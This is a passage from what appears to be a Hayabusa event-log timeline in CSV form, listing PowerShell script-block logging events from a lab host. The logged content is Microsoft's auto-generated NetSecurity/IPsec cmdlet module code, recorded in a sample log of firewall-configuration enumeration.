'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Servers')) { [object]$__cmdletization_value = ${Servers} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Domains')) { [object]$__cmdletization_value = ${Domains} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AddressType')) { [object]$__cmdletization_value = ${AddressType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AddressType'; ParameterType = 'Microsoft.PowerSh",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DnsServers')) { [object]$__cmdletization_value = ${DnsServers} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('SyncPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Update-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction] ${Action}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv6Addresses}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv4Addresses}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv6Addresses')) { [object]$__cmdletization_value = ${IPv6Addresses} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv4Addresses')) { [object]$__cmdletization_value = ${IPv4Addresses} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PassThru')) { [object]$__cmdletization_value = ${PassThru} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('SetPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecMainModeRule ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property 